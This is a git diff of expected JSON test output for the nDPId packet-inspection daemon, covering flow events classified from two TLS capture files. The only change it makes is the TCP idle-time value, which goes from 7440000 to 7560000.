-00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":315,"packets-processed":315,"total-skipped-flows":0,"total-l4-data-len":95708,"total-not-detected-flows":1,"total-guessed-flows":5,"total-detected-flows":31,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":35,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":218,"global_ts_msec":1626168081946} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/tls_cipher_lens.pcap.out b/test/results/tls_cipher_lens.pcap.out index 01dc34f16..e28520b74 100644 --- a/test/results/tls_cipher_lens.pcap.out +++ b/test/results/tls_cipher_lens.pcap.out 
@@ -1,25 +1,25 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1391444859282} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
